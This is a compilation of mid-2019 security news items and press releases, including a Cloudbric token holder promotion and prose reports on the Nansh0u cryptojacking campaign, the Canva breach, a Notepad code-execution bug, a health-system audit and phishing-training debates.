CLB Super Holder Event

For all CLB holders and super fans, we are proud to announce that we will be holding a special CLB token snapshot event!

CLB holders that purchase and hold a minimum of 100,000 CLB tokens in a designated wallet will automatically be eligible to receive free CLB and CLBK (upcoming KLAY compatible CLB token launch) token bonuses based on the market price of CLB at the time of the snapshot.

The event snapshot will officially end on June 17th, 2019 at 4pm Korean Standard Time.

What is CLBK?

As an official Initial Service Partner (ISP), Cloudbric will be distributing new CLBK tokens that will be used interchangeably with Klaytn’s upcoming KLAY token, as well as the Klaytn blockchain.


Event Details

Starting today, users that hold a minimum of 100,000 CLB tokens by the end of the snapshot period will be able to receive free CLB and CLBK bonus distributions to their accounts.

All eligible CLB holders will receive a guaranteed minimum of 5% cumulative bonus distributions (CLB and CLBK tokens)of their total CLB stake as long as they hold the minimum CLB token amount.

All users will also have a chance to earn even higher bonus distribution tiers based on the final market price of CLB at the time of the snapshot.

  • End Date:June 17th, 2019 at 4pm Korean Standard Time
  • Distribution:CLB bonuses will be distributed within 7 business days of the event snapshot (please note that CLBK tokens will be distributed AFTER the Klaytn mainnet launch)
  • Requirements: Participating users must have a minimum of 100,000 CLB tokens at the time of the snapshot
  • How to apply: Complete and submit the application form below with your email address and wallet address information (must NOT be an exchange wallet address)


CLB/CLBK Rewards Distribution

All eligible users will be able to receive a 5% cumulative bonus distribution of their total CLB stake.

However, higher bonus tiers are available based on the final market price of CLB at the time of the snapshot.

Please note that CLB market price and subsequent bonus distribution tiers will be based on the Korean Won price of CLB listed on Bitsonic Exchange.


For more information on Bitsonic Exchange, please visit their website at:


Refer to the table below to see the various bonus distribution tiers.

Snapshot Price Total Bonus CLB Bonus CLBK Bonus
Under 15 won 5% 2.5% 2.5%
15 – 19 won 7% 3.5% 3.5%
20 – 29 won 10% 5% 5%
30 – 49 won 15% 7.5% 7.5%
Higher than 50 won 30% 15% 15%
  • CLB and CLBK token distribution amounts will be the same
  • CLBK tokens will be eligible for distribution AFTER the Klaytn mainnet launch


Important Disclaimer

  • Multiple applications are allowed as long as each individual wallet account meets the minimum CLB token requirements per account (cannot submit multiple accounts that are under 100,000 CLB)
  • To prevent any issues of email or wallet addresses being inputted incorrectly, take and hold a screen capture of your information as shown below until the end of the event.
  • Each user must submit a separatepersonal wallet address for their event application. We will NOT accept exchange wallet addresses
  • If it is determined that a transaction or wallet information is invalid, unfair, or stolen, then distribution to these accounts will NOT be made
  • Cloudbric accepts all rights and responsibilities to the event



☆★Preview Event: CLBK Airdrop Event☆★

On June 27th, 2019, Kakao’s long awaited Klaytn mainnet will officially launch!

In celebration of the launch, Cloudbric will be running a special CLBK token airdrop event.

Please stay tuned for more information and announcements regarding our airdrop event coming soon.

The post CLB Super Holder Event appeared first on Cloudbric.

Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers

Guardicore Labs uncovered a widespread cryptojacking campaign tracked as Nansh0u and aimed at Windows MS-SQL and PHPMyAdmin servers.

Security experts at Guardicore Labs uncovered a widespread cryptojacking campaign leveraging a malware dubbed Nansh0u. The malicious code aimed at Windows MS-SQL and PHPMyAdmin servers worldwide.

According to the experts, the malicious campaign is being carried out by a Chinese APT group.

According to the experts Nansh0u malware has already infected nearly 50,000 servers worldwide. Threat actors also delivered a sophisticated kernel-mode rootkit on compromised systems to prevent the malware from being terminated.

“During the past two months, the Guardicore Labs team has been closely following a China-based campaign which aimed to infect Windows MS-SQL and PHPMyAdmin servers worldwide.” reads the report published by Guardicore.

“Breached machines include over 50,000 servers belonging to companies in the healthcare, telecommunications, media and IT sectors. Once compromised, the targeted servers were infected with malicious payloads. These, in turn, dropped a crypto-miner and installed a sophisticated kernel-mode rootkit to prevent the malware from being terminated.”

The attacks date back to February 26, experts observed over seven hundred new victims per day. Researchers discovered 20 versions of malicious payloads, with new payloads created at least once a week and immediately involved in the campaign after their creation time.

nansh0u infections

Threat actors use to launch brute-force attacks against previously identified Windows MS-SQL and PHPMyAdmin servers that are exposed online.

Once successfully logged in with administrative privileges, threat actors execute a sequence of MS-SQL commands that allow them to download malicious payload from a remote file server and execute it with SYSTEM privileges.

Attackers used two exploits tracked as apexp.exe and apexp2012.exe that trigger the privilege escalation vulnerability CVE-2014-4113. The exploits allow running any executable with SYSTEM privileges.

“Using this Windows privilege, the attacking exploit injects code into the winlogon process. The injected code creates a new process which inherits winlogon’s SYSTEMprivileges, providing equivalent permissions as the prior version.” continues the analysis.

The payloads used in this campaign were droppers used to deliver a cryptocurrency miner to mine TurtleCoin cryptocurrency.

Experts observed many payloads dropping a kernel-mode driver using ransom file names and placed them in AppData/Local/Temp. The compile time for these files suggests that it had been created in 2016, but most AV engines still not detect them as malicious.

The driver had a digital signature issued by the top Certificate Authority Verisign

We can confidently say that this campaign has been operated by Chinese attackers.” concludes the report.

We base this hypothesis on the following observations:

  • The attacker chose to write their tools with EPL, a Chinese-based programming language.
  • Some of the file servers deployed for this campaign are HFSs in Chinese.
  • Many log files and binaries on the servers included Chinese strings, such as 结果-去重复 (“duplicates removed”) in logs containing breached machines, or 开始 (“start”) in the name of the script initiating port scans.”

Experts also published a list of IoCs (indicators of compromise) and a free PowerShell-based script that could be used by Windows admins to check whether their systems are infected or not.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – nansh0u malware, hacking)

The post Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers appeared first on Security Affairs.

A veteran’s look at the cybersecurity industry and the problems that need solving

For many in the infosec industry, Daniel Miessler needs no introduction, as he’s a 20-year industry veteran, a professional that fulfilled a variety of security roles at companies like HP and IOActive, a leader of the OWASP IoT Security Project and, most prominently, the author of the popular Unsupervised Learning podcast, newsletter and blog. Apart from effectively curating and summarizing content produced by others, Miessler is also the source of interesting ideas and occasionally unorthodox … More

The post A veteran’s look at the cybersecurity industry and the problems that need solving appeared first on Help Net Security.

Majority of CISOs plan to ask for an increase in cybersecurity investment

Most CISOs of financial institutions (73 percent) plan to ask their organization’s CFO for an increase in cybersecurity investments in the next year, according to the Financial Services Information Sharing and Analysis Center (FS-ISAC), an industry consortium dedicated to reducing cyber-risk in the global financial system. “The advancement and adoption of new technologies coupled with increased geopolitical tension has fueled a rapidly evolving cyber threat landscape,” said Steve Silberstein, CEO of FS-ISAC. “An effective cybersecurity … More

The post Majority of CISOs plan to ask for an increase in cybersecurity investment appeared first on Help Net Security.

Security overconfidence and immaturity continue to endanger organizations

The majority of organizations are ill-prepared to protect themselves against privileged access abuse, the leading cyber-attack vector, according to Centrify and Techvangelism. Seventy-nine percent of organizations do not have a mature approach to Privileged Access Management (PAM), yet 93% believe they are at least somewhat prepared against threats that involve privileged credentials. This overconfidence and immaturity are underscored by 52% of organizations surveyed stating they do not use a password vault, indicating that the majority … More

The post Security overconfidence and immaturity continue to endanger organizations appeared first on Help Net Security.

New initiative aims to strengthen IoT security, interoperability and reliability

The Zigbee Alliance publicly announced a major ongoing initiative to make smart home and IoT products easier to develop, deploy, and sell across ecosystems. The All Hubs Initiative is driven by a Zigbee Alliance workgroup comprised of leading IoT companies including Amazon, Comcast, Exegin, Kwikset, Landis+Gyr, LEEDARSON, Legrand, MMB Networks, NXP, OSRAM, Schneider Electric, Silicon Labs, Somfy, and many others with the goal of improving interoperability between IoT devices and major consumer and commercial platforms. … More

The post New initiative aims to strengthen IoT security, interoperability and reliability appeared first on Help Net Security.

Businesses are struggling to implement adequate IAM and PAM processes, practices and technologies

Businesses find identity and access management (IAM) and privileged access management (PAM) security disciplines difficult yet un-concerning. The results infer that IAM- and PAM-related security tasks may be deprioritized or neglected, potentially exposing organizations to data breaches and other cyber risks. Conducted at RSA Conference in early March 2019, One Identity’s study polled 200 conference attendees on their biggest security challenges and concerns, as well as their workplace behaviors related to network and system access. … More

The post Businesses are struggling to implement adequate IAM and PAM processes, practices and technologies appeared first on Help Net Security.

Many are seeing the damage of cybercrime and identity theft firsthand

As massive data breaches continue to make international headlines and the Internet is an integral part of our daily lives, consumers are now grasping the risks they face. In a new F-Secure survey, 71% of respondents say they feel that they will become a victim of cybercrime or identity theft, while 73% expressed similar fears about their kids. “These findings are absolutely staggering and show many people are seeing the damage of cybercrime or identity … More

The post Many are seeing the damage of cybercrime and identity theft firsthand appeared first on Help Net Security.

Palo Alto Networks to acquire Twistlock and PureSec

Palo Alto Networks has entered into definitive agreements to acquire Twistlock, the leader in container security, and PureSec, a leader in serverless security, to extend its Prisma cloud security strategy. These proposed acquisitions will further advance the company’s ability to offer the most complete and comprehensive cloud security suite in all critical areas of cloud security. Prisma, used by approximately 9,000 customers worldwide, helps enable a secure journey to the cloud by providing organizations with … More

The post Palo Alto Networks to acquire Twistlock and PureSec appeared first on Help Net Security.

New Zealand Opposition Behind Budget Info Hack?

Two thousand unauthorized access attempts in 48-hours, that is how New Zealand’s Treasury Secretary in coordination with the National Cyber Security Centre described the budget information record hacking incident that happened this week. New Zealand’s new public spending law dubbed “well-being budget” is expected to be publicly disclosed in full on Thursday, May 30, 2019. But prior to that, the National party which is serving as the opposition partly released snippets of the budget prior to the official release date.

“Following this morning’s media reports of a potential leak of Budget information, the Treasury has gathered sufficient evidence to indicate that its systems have been deliberately and systematically hacked. The Treasury takes the security of all the information it holds extremely seriously. It has taken immediate steps today to increase the security of all budget-related information and will be undertaking a full review of information security processes. There is no evidence that any personal information held by the Treasury has been subject to this hacking,” explained Gabriel Makhlouf, Treasury Secretary.

National Party’s leader, Simon Bridges denied insinuations that the opposition has something to do with the hacking incident, he also accused the administration party of performing an alleged witch-hunt to discredit them. “There has been no hacking under any definition of that word … there has been nothing illegal or even approaching that. We have acted legally, appropriately, without any hacking or anything approaching that by the National Party. Or indeed what Grant Robertson is saying, that’s how we’ve got it, he is wrong. They [the government] are not in control of what they are doing, so they are lashing out and they are having a witch-hunt.” emphasized Bridges.

The government of New Zealand, through its Treasury Department, is still confirming the continuation of the budget disclosure on the same original date as planned prior to the massive hacking incident. The National Party leadership squarely place the blame to the incompetence of the Treasury officials, more particularly of Makhlouf for mishandling government data and him calling the assistance of police as if cybercrime is a typical street crime. The opposition leader refused to explain how did they were able to secure a copy of the well-being budget.

“There’s this potential talk around cybersecurity and so on — I was a minister in charge of cybersecurity for Bill English and what I know is departments like the Treasury, with big organizations, there are attempts at hacking and so on, if not every day, very commonly. I don’t know what the situation with that is, but they wouldn’t have called in the police if that was what they were worried about,” concluded Bridges.

New Zealand’s well-being budget aims to change the fiscal priorities of the government, with stronger focus with funding actions against domestic abuse, better mental health care system and protection against child labor practices due to poverty. With social services taking a lion share of the budget, the government of New Zealand is distancing itself from more economic growth compared to previous years. The administration believes that domestic protection should receive more focus this year.

Also, Read:

Prolific Hacker SandboxEscaper Demos Windows 10 Zero-Day Exploit

Fundamentals Of Making A Hacker Out Of You

Criminals Hack Forum Used for Trading Stolen Credentials

Hackers Inject Scripts in WordPress Live Chat Plugin

Stack Overflow’s Production Systems Accessed by Hackers


The post New Zealand Opposition Behind Budget Info Hack? appeared first on .

Moogsoft AIOps 7.2 eases the burden of IT operations and DevOps teams

Moogsoft, a pioneer and leading provider of artificial intelligence for IT operations (AIOps), released Moogsoft AIOps 7.2, the latest version of its enterprise platform. Release 7.2 features groundbreaking new capabilities that ease the burden of IT Operations and DevOps teams by optimizing service assurance. Significant new transparency, efficiency, and customization enhancements include: a new workflow engine, AI visualizations, performance dashboards, and new tool integrations. “Operations teams seek ways to tame the complexity of their IT … More

The post Moogsoft AIOps 7.2 eases the burden of IT operations and DevOps teams appeared first on Help Net Security.

Journey to OSCP -10 Things You Need to Know

“OSCP is not about clearing the exam. It’s all about working deeply on labs.” –Ramkisan Mohan (Check out his detailed guide to OSCP Preparation) I began my OSCP journey in the late fall of 2018. So far, I’ve rooted 23+ machines in the PWK labs, and I am still plugging away, hoping to get as […]… Read More

The post Journey to OSCP -10 Things You Need to Know appeared first on The State of Security.

SailPoint Predictive Identity platform: The future of identity governance

SailPoint, the leader in enterprise identity governance, unveiled the SailPoint Predictive Identity platform, the intelligent cloud identity platform of the future that accelerates the industry to the next generation of identity governance. With SailPoint Predictive Identity, SailPoint is delivering a new world of adaptive security and continuous compliance that makes identity easy, transparent and autonomous. “The next phase of identity needs to anticipate user access needs, spot and respond to risky behavior, achieve continuous compliance … More

The post SailPoint Predictive Identity platform: The future of identity governance appeared first on Help Net Security.

ID Analytics and Alloy partner to fight fraud and mitigate risk

ID Analytics, a leader in consumer risk management, and Alloy, the platform helping the financial services industry make data-driven customer decisions, announced a partnership to help financial services companies more effectively mitigate risk and fight fraud. Alloy will use insights from the ID Analytics’ ID Network to provide its customers with additional insight to help them better authenticate consumers’ identities. The addition of data from ID Analytics’ ID Network will help Alloy customers mitigate risk … More

The post ID Analytics and Alloy partner to fight fraud and mitigate risk appeared first on Help Net Security.

Trend Micro works with security awareness vendors to offer free training content

Trend Micro announced partnerships with several leading cybersecurity training providers to help businesses protect their employees from the latest cyber threats. To ensure customers have a wide variety of training styles and formats, Trend Micro is teaming up with four leading partners: NINJIO, InfoSec, NextTech Security, and GoldPhish. The new training materials are available on Trend Micro’s Phish Insight tool, which is a free, highly flexible security awareness solution. This new educational platform will offer … More

The post Trend Micro works with security awareness vendors to offer free training content appeared first on Help Net Security.

Zyxel SD-WAN gets security, usability and speed boost

Zyxel Communications, a leading provider of secure broadband networking, Internet access and connected home products, announced several performance and feature enhancements to Zyxel SD-WAN. Zyxel SD-WAN allows SMBs to leverage the power of the cloud with a centrally-managed solution that increases performance, lowers costs and is more agile when compared to MPLS networks. Zyxel SD-WAN provides a reliable and secure WAN through an annual software license that runs on ZyWALL VPN50, VPN100 and VPN300 firewalls. … More

The post Zyxel SD-WAN gets security, usability and speed boost appeared first on Help Net Security.

Vology expands to deliver dark web monitoring services

Vology has expanded its cybersecurity solutions suite to now deliver Dark Web Monitoring Services. With this addition, Vology further enhances its comprehensive security approach by offering protection to organizations at risk due to exposed business usernames and passwords, then alerting them if their digital credentials are accessible to anonymous or untraceable users and website operators. By utilizing Vology’s comprehensive suite of cybersecurity solutions, businesses have access to industry-leading tools to protect their networks and sensitive … More

The post Vology expands to deliver dark web monitoring services appeared first on Help Net Security.

Ethernity Networks introduces its ENET Universal Edge Platform network appliance

Ethernity Networks, a leading innovator of comprehensive networking and security solutions on programmable hardware, introduced its ENET Universal Edge Platform (UEP) network appliance, an edge-optimized low-space, low-power FPGA-based programmable device with up to 40Gbps of networking capacity and 10Gbps of IPSec security performance. The UEP’s unique modularity enables the appliance to be easily adapted for multiple use cases, such as NID, DPU and MDU, and cell site router. With its embedded dual-core ARM processor that … More

The post Ethernity Networks introduces its ENET Universal Edge Platform network appliance appeared first on Help Net Security.

CyberData releases two secure access control endpoints for SMB market

CyberData Corporation continues its focus on Secure Access Control for the SMB market with two new releases: SIP Outdoor Intercom RFID Access Control Endpoint and SIP Outdoor Video Intercom RFID Keypad Access Control Endpoint. With these two new releases, VoIP VARs and Integrators who serve the SMB market can deliver a complete IP Access Control solution to customers using the customer’s new or existing IP PBX server, and without the usual monthly monitoring or set … More

The post CyberData releases two secure access control endpoints for SMB market appeared first on Help Net Security.

How McAfee’s Mentorship Program Helped Me Shine in My Career Journey

By: Anshu, Software Engineer

“The mind is not a vessel that needs filling, but wood that needs igniting.”—Mestrius Plutarchus

A mentor isn’t someone who answers your questions, but someone who helps you ask the right ones. After joining the McAfee WISE mentorship program as a mentee, I understood the essence of these words.

WISE is a community committed to providing opportunities for growth and success, increasing engagement, and empowering women at McAfee. Each year, WISE helps women network and find opportunities for their career development.

Joining the McAfee WISE Mentorship Program

The WISE Mentorship Program was introduced to address how women have been underrepresented in the tech sector, especially in cybersecurity.  It’s believed that mentoring can address and improve job satisfaction and retention, which is how the program found its way to India and I learned about it. As an employee at McAfee for over five years, I had the opportunity to learn a lot of new things, but networking was a skillset I needed to hone. I thought this might be my chance to develop my skills, so I enrolled as a mentee.

I was partnered with “Chandramouli” also known as “Mouli” who happened to be the executive sponsor for the WISE India Chapter, as well as one of our IT leaders.

The Mentor-Mentee Relationship

My sessions with Mouli were informal conversations rather than formal sync-ups. We not only discussed the industry and women in tech—but also our personal stories, the books we read and are inspired by. We discovered a common love for badminton, so we started sharing analogies of how we would handle situations at work compared to game and life scenarios.

And the lessons learned were humbling. You win, you lose, you conquer. This thought shifted my perspective to think about how I would react if it was a badminton match. Would I accept defeat even if the opponent was on game point? Would I play differently even if I knew the match was lost? I realized I would fight and fiercely compete. This simple shift started to make me think on my toes daily.

Like many people, I had a fair idea of how I wanted my career to shape up, but with the help of a mentor, I began to steer faster toward my goal. In just one session, we were able to identify areas that were slowing down my development.

Developing My Skills

We noticed that networking was one of my key improvement areas, so we decided to tackle this with baby steps. He assigned small but achievable tasks to me—tasks as simple as creating a LinkedIn profile and connecting with former and current co-workers.

What happened after that was truly amazing. People from all walks of life in the industry, from my school, college, and more, started connecting with me, and it was then when I realized I had made an impression. Now I find it easier to initiate conversations, knowing that people are ready to help and talk about things we mutually love. As small as these strides might be, they helped me not just move ahead, but also provided me with measurable momentum.

Being able to discuss and question the status quo and engage with someone who is more experienced, knows the art of the game, and is a fierce champion for WISE is something I look forward to every month. Thanks to McAfee for giving each one of us this opportunity to help further our careers and to help us dream big.

Interested in joining our team? We’re hiring! Apply now.

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

The post How McAfee’s Mentorship Program Helped Me Shine in My Career Journey appeared first on McAfee Blogs.

AttackIQ announces $17.6 million in Series B funding

AttackIQ, the leader in the emerging market for continuous security validation, announced $17.6 million in Series B funding led by Khosla Ventures and existing investors including Index Ventures, Salesforce Ventures and Telstra Ventures. This brings AttackIQ’s total funding to approximately $35 million. The company will use the funds to continue development of its continuous security validation platform, increase hiring across all functional areas and further expand field operations. AttackIQ also announced that Brian Byun, partner … More

The post AttackIQ announces $17.6 million in Series B funding appeared first on Help Net Security.

Attention Graphic Designers: It’s Time to Secure Your Canva Credentials

Online graphic design tools are extremely useful when it comes to creating resumes, social media graphics, invitations, and other designs and documents. Unfortunately, these platforms aren’t immune to malicious online activity. Canva, a popular Australian web design service, was recently breached by a malicious hacker, resulting in 139 million user records compromised.

So, how was this breach discovered? The hacker, who goes by the name GnosticPlayers, contacted a security reporter from ZDNet on May 24th and made him aware of the situation. The hacker claims to have stolen data pertaining to 1 billion users from multiple websites. The compromised data from Canva includes names, usernames, email addresses, city, and country information.

Canva claims to securely store all user passwords using the highest standards via a Bcrypt algorithm. Bcrypt is a strong, slow password-hashing algorithm designed to be difficult and time-consuming for hackers to crack since hashing causes one-way encryption. Additionally, each Canva password was salted, meaning that random data was added to passwords to prevent revealing identical passwords used across the platform. According to ZDNet, 61 million users had their passwords encrypted with the Bcrypt algorithm, resulting in 78 million users having their Gmail addresses exposed in the breach.

Canva has notified users of the breach through email and ensured that their payment card and other financial data is safe. However, even if you aren’t a Canva user, it’s important to be aware of what cybersecurity precautions you should take in the event of a data breach. Check out the following tips:

  • Change your passwords. As an added precaution, Canva is encouraging their community of users to change their email and Canva account passwords. If a cybercriminal got a hold of the exposed data, they could gain access to your other accounts if your login credentials were the same across different platforms.
  • Check to see if you’ve been affected. If you’ve used Canva and believe your data might have been exposed, use this tool to check or set an alert to be notified of other potential data breaches.
  • Secure your personal data. Use a security solution like McAfee Identity Theft Protection. If your information is compromised during a breach, Identity Theft Protection helps monitor and keep tabs on your data in case a cybercriminal attempts to use it.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Attention Graphic Designers: It’s Time to Secure Your Canva Credentials appeared first on McAfee Blogs.

Axonius cybersecurity asset management app now available on Cortex by Palo Alto Networks

Axonius announced the availability of its cybersecurity asset management app on Cortex by Palo Alto Networks – the industry’s only open and integrated AI-based continuous security platform. Building on Cortex allows partners to use normalized and stitched together data from customers’ entire enterprises to build cloud-based apps that constantly deliver innovative cybersecurity capabilities to joint customers. The cybersecurity asset management platform from Axonius gives organizations complete visibility and automated policy validation on all assets, devices, … More

The post Axonius cybersecurity asset management app now available on Cortex by Palo Alto Networks appeared first on Help Net Security.

Google white hat hacker found code execution flaw in Notepad

The popular white hat hacker Tavis Ormandy has announced the discovery of a code execution vulnerability in Microsoft’s Notepad text editor.

The Google Project Zero researcher Tavis Ormandy announced the discovery of a code execution flaw in Microsoft’s Notepad text editor.

Ormandy reported the issue to Microsoft and will wait 90 days according to Google vulnerability policy disclosure before revealing technical details of the flaw.

Of course, Ormandy could also disclose the details of the vulnerability after Microsoft will release a security patch to address the issue.

Ormandy anticipated that the vulnerability is a memory corruption bug and he shared via Twitter an image that demonstrates how to manage a “pop a shell in Notepad.”

The image posted by Ormandy shows that the vulnerability has been exploited to launch a Command Prompt, the expert confirmed he has already developed a “real exploit” for the issue.


A message published by Chaouki Bekrar, founder of zero-day broker Zerodium, confirms that the type of issue found by the Google white hat hacker is not uncommon to find. The real surprise, according to Chaouki Bekrar, is to find an expert that report it to Microsoft instead of exploiting it or attempt to sell it.

Stay tuned …

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Notepad, hacking)

The post Google white hat hacker found code execution flaw in Notepad appeared first on Security Affairs.

Victoria’s Public Health System “Highly Vulnerable”: Report

Victoria’s public health system is “highly vulnerable” to a Singapore-like data breach, according to a recent report.

As per an auditor general report released recently, the public health system in Victoria is vulnerable to an attack like the one that Singapore had experienced last year. The Singapore data breach had led to the exfiltration of almost 1.5 million patient health records.

The report by the auditor general reads, “Victoria’s public health system is highly vulnerable to the kind of cyberattacks recently experienced by the National Health Service (NHS) in England, in Singapore, and at a Melbourne‐based cardiology provider, which resulted in stolen or unusable patient data and disrupted hospital services.”

The report further explains that there are key weaknesses in the “physical security” and “logical security” of the health services. This includes critical aspects like password management and other user access controls. Low data security awareness among the staff, which increases the success of social engineering attacks (like phishing or tailgating into corporate areas where ICT infrastructure and servers may be located), is also highlighted in the report.

The audit covered four health services, namely Barwon Health (BH), the Royal Children’s Hospital (RCH), and the Royal Victorian Eye and Ear Hospital (RVEEH), plus two different areas of the DHHS (Department of Health and Human Services). The auditor-general’s team managed to exploit security vulnerabilities and access patient data in all the four agencies.

The report notes, “The audited health services are not proactive enough, and do not take a whole‐of‐hospital approach to security that recognises that protecting patient data is not just a task for their IT staff.”

It was also noted that health services relied on external services providers, but at the same time, they were not fully aware of the security controls implemented by the platforms that these providers were using.

“The three audited health services are not fully aware of whether their service providers have the necessary security controls. Due to the sector’s reliance on third‐party vendors, health services need to actively monitor vendor performance to ensure that patient data is safe, ” says the report.

Victoria’s public health services, which manage their ICT systems independently, is supported as regards cybersecurity by DHHS’s Digital Health branch, which develops guidance materials, runs awareness and training sessions and funds ICT infrastructure upgrades. A set of 72 baseline cybersecurity controls, which health services need to implement by 2020-21, have also been developed. But none of the public health services in. Victoria has fully implemented these 72 controls to date. They cite different reasons for this.

The audit report explains, “While Digital Health has set a clear roadmap for health services to follow, to date no health service has fully implemented the 72 controls. The audited health services advise that barriers to implementing the controls include a lack of dedicated cybersecurity staff and insufficient resources for ICT projects.”

“While it may be challenging for health services to balance ICT security against clinical projects, implementing all the controls will provide health services with strong baseline protection against cybersecurity risks. Recent, local examples of cyberattacks in health services demonstrate the need for this work to occur, ” the report points out.

That there are no penalties for non-compliance is also perhaps one of the reasons for the slow implementation of the controls,

The audit report has brought to light issues pertaining to access control management. It found unused as well as terminated employee accounts that were still enabled and also found a lack of regular user access reviews. The health services did not keep user access forms, which are needed to authenticate users. The audit also revealed that many passwords, even on administrator accounts, were easily hackable. Some of these were even system default ones. It was also found that health services rarely used multi‐factor authentication, even for ICT staff and administrator accounts.

The report from the Auditor-General’s office also includes a detailed list of recommendations to be followed.

Related Resources:

How Financial Apps Could Render You Vulnerable to Attacks

Vulnerable Legacy Systems Used By Banks, Need A Careful Review

MacOS AirMail 3 App, Vulnerable to Email Leaks

Are Apps Like Slack And Dropbox Actually Vulnerable To Attack?

The post Victoria’s Public Health System “Highly Vulnerable”: Report appeared first on .

Should Failing Phish Tests Be a Fireable Offense?

Would your average Internet user would be any more vigilant against phishing scams if he or she faced the real possibility of losing their job after falling for one too many of these emails? Recently, I met someone at a conference who said his employer had in fact terminated employees for such repeated infractions. As this was the first time I’d ever heard of an organization actually doing this, I asked some phishing experts what they thought (spoiler alert: they’re not fans of this particular teaching approach).

John LaCour is founder and chief technology officer of PhishLabs, a Charleston, S.C. based firm that helps companies educate and test employees on how not to fall for phishing scams. The company’s training courses offer customers a way to track how many employees open the phishing email tests and how many fall for the lure.

LaCour says enacting punitive measures for employees who repeatedly fall for phishing tests is counterproductive.

“We’ve heard from some of our clients in the financial industry that have similar programs where there are real consequences when people fail the tests, but it’s pretty rare across all types of businesses to have a policy that extreme,” LaCour said.

“There are a lot of things that organizations can do that aren’t as draconian and still have the desired effect of making security posture stronger,” he said. “We’ve seen companies require classroom training on the first failure, to a manager has to sit through it with you on the second time, to revoking network access in some cases.”

LaCour said one of the most common mistakes he sees is companies that purchase a tool to launch simulated phishing campaigns just to play “gotcha” with employees.

“It really demotivates people, and it doesn’t really teach them anything about how to be more diligent about phishing attacks,” he said. “Each phishing simulation program needs to be accompanied by a robust training program, where you teach employees what to do when they see something phishy. Otherwise, it just creates resentment among employees.”

Rohyt Belani, CEO of Leesburg, Va.-based security firm Cofense (formerly PhishMe), said anti-phishing education campaigns that employ strongly negative consequences for employees who repeatedly fall for phishing tests usually create tension and distrust between employees and the company’s security team.

“It can create an environment of animosity for the security team because they suddenly become viewed as working for Human Resources instead of trying to improve security,” Belani said. “Threatening people usually backfires, and they end up becoming more defiant and uncooperative.”

Cofense provides a phish reporting system and encourages customers to have their employees flag suspected phishing attacks (and tests), and Belani said those employee reports can often stymie real phishing attacks.

“So what happens a lot of times is a person may click on link in a real phishing email, and three seconds later realize, ‘Oops, I shouldn’t have clicked, let me report it anyway’,” Belani said. “But if that person knew there was a punitive angle to doing so, they’re more likely not to report it and to say, ‘You know what, I didn’t do it. Where’s the proof I clicked on the link?'”

LaCour says PhishLabs encourages clients to use positive reinforcement in their employee training campaigns.

“Recognition — where employees and departments that do especially well are acknowledged — is very common,” LaCour said. “We also see things like small gifts or other things that companies would typically use to reward employees, such as gift cards or small bonuses for specific departments or people.”

LaCour said his offices make a game out of it.

“We make it competitive where we post the scores of each department and the lowest scoring department has to buy lunch for the rest of the department,” he said. “It teaches people there are real consequences and that we all need to be diligent when it comes to phishing.”

What about you, dear readers? Does your employer do phishing awareness training and testing? What incentives or disincentives are tied to those programs? Sound off in the comments below.

25% of Workers Would Give Away Data for £1000

25% of Workers Would Give Away Data for £1000

It's been a year since the implementation of GDPR, and it seems that businesses are as vulnerable as ever. According to a report by nCipher, 71% of the UK C-suite would be willing to cover up a data breach if they could escape the fines, compared with the 57% of managers and directors.

The survey found that while investment in employee training was second to investment in technology, IT leaders still find they lack support from the board and the wider C-suite. This is experienced within midsized companies (250–999 employees). 

Peter Galvin, chief strategy and marketing officer, nCipher Security, said, “Organizations are under a greater obligation than ever to disclose data breaches, particularly when personal information is at risk, but evidently many IT leaders – particularly at C-Level – still feel they can avoid being subject to fines and other punitive measures from regulatory bodies.”

However, it's not just the C-suite that is putting businesses at risk. According to a report by Deep Secure, almost half of office employees would be willing to sell corporate information to people outside their organization. In a company announcement, the company said that "£1,000 would be enough to tempt 25% of employees to give away company information." Shockingly, 5% would give it away for free.

The What Is the Price of Loyalty Report reveals how 10% of respondents would also sell intellectual property, such as product specifications, product code and patents, for £250 or less. The findings also revealed that one in five (19%) of respondents in graduate-level roles admitted that they were paid to source the information, with 29% of 16–24-year-olds reporting they had been approached by someone they didn’t know to take it.
Dan Turner, CEO of Deep Secure, commented, “The cost of employee loyalty is staggeringly low. With nearly half of all office workers admitting that they would sell their company's and clients’ most sensitive and valuable information, the business risk is not only undisputable but immense in the age of GDPR and where customers no longer tolerate data breaches. 
“Given the prevalent use of digital and cyber tactics to exfiltrate this information, it’s critical that businesses invest in a security posture that will help them both detect and prevent company information from leaving the network,” he said.

25% of Workers Would Give Away Data for £1,000

25% of Workers Would Give Away Data for £1,000

It's been a year since the implementation of GDPR, and it seems that businesses are as vulnerable as ever. According to a report by nCipher, 71% of the UK C-suite would be willing to cover up a data breach if they could escape the fines, compared with the 57% of managers and directors.

The survey found that while investment in employee training was second to investment in technology, IT leaders still find they lack support from the board and the wider C-suite. This is experienced within midsized companies (250–999 employees). 

Peter Galvin, chief strategy and marketing officer, nCipher Security, said, “Organizations are under a greater obligation than ever to disclose data breaches, particularly when personal information is at risk, but evidently many IT leaders – particularly at C-Level – still feel they can avoid being subject to fines and other punitive measures from regulatory bodies.”

However, it's not just the C-suite that is putting businesses at risk. According to a report by Deep Secure, almost half of office employees would be willing to sell corporate information to people outside their organization. In a company announcement, the company said that "£1,000 would be enough to tempt 25% of employees to give away company information." Shockingly, 5% would give it away for free.

The What Is the Price of Loyalty Report reveals how 10% of respondents would also sell intellectual property, such as product specifications, product code and patents, for £250 or less. The findings also revealed that one in five (19%) of respondents in graduate-level roles admitted that they were paid to source the information, with 29% of 16–24-year-olds reporting they had been approached by someone they didn’t know to take it.
Dan Turner, CEO of Deep Secure, commented, “The cost of employee loyalty is staggeringly low. With nearly half of all office workers admitting that they would sell their company's and clients’ most sensitive and valuable information, the business risk is not only undisputable but immense in the age of GDPR and where customers no longer tolerate data breaches. 
“Given the prevalent use of digital and cyber tactics to exfiltrate this information, it’s critical that businesses invest in a security posture that will help them both detect and prevent company information from leaving the network,” he said.

ESET Exposes Turla Malware Attacks on European Diplomats

